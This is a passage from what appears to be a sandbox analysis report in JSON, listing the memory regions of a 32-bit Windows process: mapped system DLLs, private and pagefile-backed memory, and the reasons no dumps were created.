"region_3267", "name": "private_0x00000000006a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6946816, "timestamp": "00:01:27.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3268", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:27.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3269", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:27.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3270", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:27.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3271", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:27.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3272", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:27.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3273", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:27.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3274", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:27.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3275", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:27.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3276", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:27.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3277", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:27.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3278", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:27.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3279", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:27.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3280", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:27.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3281", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:27.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3282", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:27.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3283", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:27.028", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3284", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:27.028", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3285", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:27.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3286", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:27.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3287", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:27.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3288", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:27.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3289", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:27.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3290", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:27.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3291", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:27.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3292", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:27.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3293", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:27.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3294", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:27.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3295", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:27.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3296", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:27.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 6717439, "entry_point": 0, "filename": null, "id": "region_3297", "name": "pagefile_0x00000000004e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5111808, "timestamp": "00:01:27.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3298", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:27.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3299", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:27.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3300", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:27.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3301", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:27.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3302", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:27.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3303", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:27.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3304", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:27.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_3305", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:27.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 3145728, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3306", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:27.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 8589311, "entry_point": 0, "filename": null, "id": "region_3307", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 9175039, "entry_point": 0, "filename": null, "id": "region_3308", "name": "private_0x0000000000880000", "norm_filename": null, "region_type": "private_memory", "start_va": 8912896, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 9830399, "entry_point": 0, "filename": null, "id": "region_3309", "name": "private_0x0000000000920000", "norm_filename": null, "region_type": "private_memory", "start_va": 9568256, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 10747903, "entry_point": 0, "filename": null, "id": "region_3310", "name": "private_0x0000000000a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 10485760, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12910592, "type": "region", "version": 1 }, "end_va": 33882111, "entry_point": 0, "filename": null, "id": "region_3311", "name": "pagefile_0x0000000000c50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12910592, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3312", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:27.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3313", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:27.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_3314", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784528895, "entry_point": 1784294216, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3315", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:27.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3316", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:27.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11730944, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 0, "filename": null, "id": "region_3317", "name": "private_0x0000000000b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 11730944, "timestamp": "00:01:27.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 34930687, "entry_point": 0, "filename": null, "id": "region_3318", "name": "private_0x0000000002050000", "norm_filename": null, "region_type": "private_memory", "start_va": 33882112, "timestamp": "00:01:27.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1783955456, "type": "region", "version": 1 }, "end_va": 1784123391, "entry_point": 1783982873, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3319", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1783955456, "timestamp": "00:01:27.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_3320", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:27.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 11206655, "entry_point": 0, "filename": null, "id": "region_3321", "name": "private_0x0000000000a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 10944512, "timestamp": "00:01:27.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 37875711, "entry_point": 34930688, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3322", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34930688, "timestamp": "00:01:27.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3323", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:27.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3324", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:27.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3325", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:27.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3326", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": 